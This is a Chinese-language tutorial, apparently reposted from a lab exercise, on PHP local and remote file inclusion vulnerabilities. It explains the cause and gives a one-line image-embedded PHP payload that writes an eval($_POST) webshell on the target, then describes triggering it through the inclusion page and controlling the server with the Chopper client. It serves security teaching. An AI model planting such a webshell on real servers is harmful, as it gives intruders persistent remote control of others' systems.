文件包含漏洞


1、原理及危害

文件包含漏洞:即file inclusion,意思是文件包含,是指當服務器開啟allow_url_include選項時,就可以通過PHP的某些特性函數(include(),require()和include_once(),requir_once())利用URL去動態包含文件,此時如果沒有對文件來源進行嚴格審查,就會導致任意文件讀取或者任意命令執行。文件包含漏洞分為本地文件包含漏洞與遠程文件包含漏洞,遠程文件包含漏洞是因為開啟了PHP配置中的allow_url_fopen選項,選項開啟之后,服務器允許包含一個遠程文件,服務器通過PHP特性(函數)去包含任意文件時,由於要包含的這個文件來源過濾不嚴,從而可以去包含一個惡意文件,而我們可以構造這個惡意文件來達到自己的目的。

  • 1、文件包含即程序通過包含函數調用本地或遠程文件,以此來實現拓展功能
  • 2、被包含的文件可以是各種文件格式,而當文件里面包含惡意代碼,則會形成遠程命令執行或文件上傳漏洞。
  • 3、文件包含漏洞主要發生在有包含語句的環境中,例如PHP所具備include、require等函數。

文件包含分為兩類:
本地文件包含LFI(local file include)當被包含的文件在服務器本地時,就形成本地文件包含
遠程文件包含RFI(remote file include)當被包含的文件在第三方服務器時,叫做遠程文件包含。

2、低安全級別滲透

2.1 本地文件包含漏洞

1、制作一句話圖片木馬。將一句話木馬寫入圖片中,使用圖片插入一句話工具,將下面的語句插入圖片中。

1 <?fputs(fopen("webshell1.php","w"),'<?php eval($_POST[webshell]);?>')?>

 

 2、上傳圖片木馬文件。將制作好的圖片上傳到服務器上,在文件包含頁面URL后跟上圖片路徑。

 

 3、執行文件包含並生成后門。后台已生成一句話木馬。

 

 4、通過菜刀連接webshell

 

2.2 遠程文件包含

將代碼放在在遠端服務器,可以保存在一個TXT文本上,遠程服務器需要開啟http服務。

 

 執行遠端服務器上的文本

 

 靶機上生成了webshell2的一句話木馬文件。使用菜刀連接即可控制服務器

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM